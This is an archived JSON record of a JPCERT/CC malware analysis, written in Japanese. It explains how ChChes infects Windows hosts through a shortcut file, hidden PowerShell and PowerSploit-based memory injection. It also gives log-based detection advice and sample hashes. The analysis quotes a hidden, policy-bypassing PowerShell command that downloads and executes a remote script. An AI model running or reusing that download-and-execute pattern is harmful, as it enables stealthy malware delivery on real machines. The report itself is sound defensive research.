{
	"id": "6bfa7fcf-f5bd-4fe7-a78d-3bf66dc7c4df",
	"created_at": "2026-04-06T00:10:41.968806Z",
	"updated_at": "2026-04-10T13:12:56.916189Z",
	"deleted_at": null,
	"sha1_hash": "31eea2eaa2085493a85ed0147e5cadebaaf11c04",
	"title": "PowerSploitを悪用して感染するマルウエア(2017-02-10) - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 972448,
	"plain_text": "PowerSploitを悪用して感染するマルウエア(2017-02-10) -\r\nJPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2017-02-09 · Archived: 2026-04-05 17:33:08 UTC\r\nChChes\r\nPowerSploitを悪用して感染するマルウエア\r\n今回は、前号の分析センターだより「Cookieヘッダーを用いてC\u0026Cサーバとやりとりするマルウエア\r\nChChes」で紹介したChChesが、PowerSploit[1]というオープンソースのツールを悪用して感染する事例\r\nを確認しましたので、その詳細について解説します。\r\nChChesが感染するまでの流れ\r\n今回確認した検体は、ショートカットファイルを悪用してマルウエアの感染を行います。ショートカ\r\nットファイルが開かれてから、ChChesに感染するまでの流れは、図1のようになります。\r\n図 1：ショートカットファイルを開いてからChChes感染までの流れ\r\nショートカットファイルが開かれると、PowerShellスクリプトを含むファイルが外部からダウンロード\r\nされ、実行されます。次に、PowerShellスクリプト内に含まれるChChesのコード（バージョン1.6.4）\r\nが、powershell.exeにインジェクションされ、実行されます。この過程の各段階における詳細な挙動を\r\n次に解説します。\r\nショートカットファイルが開かれた時の挙動\r\nショートカットファイルを開くと内部に含まれている次のPowerShellスクリプトが実行されます。\r\npowershell.exe -nop -w hidden -exec bypass -enc JAAyAD0AJwAtAG4Abw~省略~\r\n「-enc」以降のPowerShellスクリプトはエンコードされており、以下がデコードしたものです。\r\n$2='-nop -w hidden -exec bypass -c \"IEX (New-Object System.Net.Webclient).DownloadString(''https://go\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 1 of 6\n\n上記PowerShellスクリプトによって、指定されているURLからPowerShellスクリプトを含むファイルが\r\nダウンロードされます。ダウンロードされたスクリプトは32bitのpowershell.exe\r\n（syswow64\\WindowsPowerShell\\v1.0\\powershell）に読み込まれて実行されます。32bitで実行する理由\r\nは、PowerShellスクリプト内に含まれるChChesのコードが64bit環境に対応していないためと考えられま\r\nす。\r\nダウンロードされるPowerShellスクリプトの詳細\r\nダウンロードされるPowerShellスクリプトはPowerSploitの一部（Invoke-Shellcode.ps1）を流用して作成\r\nされています。PowerSploitは、リモートのコンピュータ上でファイルやコマンドを実行するためのツ\r\nールで、ペネトレーションテストなどに利用されます。\r\nダウンロードされたPowerShellスクリプトは実行されると、内部に含まれるドキュメントファイル\r\nを%TEMP%フォルダに作成し、表示します。表示するドキュメントファイルはExcel文書やWord文書な\r\nど複数のパターンが存在することを確認しています。\r\nさらにPowerShellスクリプトは、内部に含まれるChChesのコードをpowershell.exeにインジェクションし\r\nます。インジェクションされたChChesは前号の分析センターだよりで紹介した通り、C2サーバから命\r\n令とモジュールを受信します。なお、このPowerShellスクリプトやインジェクションされるChChesは、\r\n感染端末上でファイルとして保存されないため、ChChes自身はメモリ上にのみ存在することになりま\r\nす。\r\n図2はPowerShellスクリプトの一部です。\r\n図 2：ダウンロードされるPowerShellスクリプト\r\nイベントログで攻撃の痕跡を確認\r\nWindows 10などPowerShell v5.0がインストールされた環境では、リモートからダウンロードされて実行\r\nされたPowerShellスクリプトがデフォルトでイベントログに記録されるようになっており、図3のよう\r\nに記録されます。調査を行う際は、このようなイベントログがないかご確認ください。\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 2 of 6\n\n図 3：イベントログに記録される内容\r\nこのようなログは、PowerShell v4.0（Windows 8.1のデフォルトバージョン）でも以下のグループポリシ\r\nーを有効にすることで取得することが可能です。\r\nコンピュータの構成 -\u003e 管理用テンプレート -\u003e Windows PowerShell -\u003e PowerShellスクリプト ブロ\r\nックのログ記録を有効にする (Turn on PowerShell Script Block Logging)\r\nおわりに\r\nPowerShellスクリプトが攻撃に利用されることは一般的になってきました。PowerShell実行時のイベン\r\nトログを取得する設定になっていない場合は、今後このような攻撃の被害にあうことを想定して、設\r\n定を見直すことを推奨します。また、PowerShellを使用していない場合は、AppLockerなどを使用して\r\n実行を制限することをご検討下さい。\r\n分析センター　朝長 秀誠\r\n参考情報\r\n[1] PowerSploit\r\n　　https://github.com/PowerShellMafia/PowerSploit\r\nAppendix A 検体のSHA-256ハッシュ値\r\nPowerShell\r\n4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297\r\n75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f\r\nae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86\r\n646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543\r\n3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03\r\n9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d\r\n723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48\r\nf45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b\r\n471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856\r\naef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 3 of 6\n\ndbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc\r\n朝長 秀誠 (Shusei Tomonaga)\r\n外資系ITベンダーでのセキュリティ監視・分析業務を経て、2012年12月から現職。現在は、マルウェ\r\nア分析・フォレンジック調査に従事。主に、標的型攻撃に関するインシデント分析を行っている。\r\nCODE BLUE、BsidesLV、BlackHat USA Arsenal、Botconf、PacSec、FIRSTなどで講演。JSACオーガナ\r\nイザー。\r\n関連記事\r\nJSAC2026 開催レポート～DAY 2～\r\n攻撃グループAPT-C-60による攻撃のアップデート\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 4 of 6\n\nCobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻\r\n撃\r\nIvanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア\r\nIvanti Connect Secureに設置されたマルウェアDslogdRAT\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 5 of 6\n\nSource: https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nhttps://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "JA",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html"
	],
	"report_names": [
		"acreport-ChChes_ps1.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434241,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/31eea2eaa2085493a85ed0147e5cadebaaf11c04.pdf",
		"text": "https://archive.orkl.eu/31eea2eaa2085493a85ed0147e5cadebaaf11c04.txt",
		"img": "https://archive.orkl.eu/31eea2eaa2085493a85ed0147e5cadebaaf11c04.jpg"
	}
}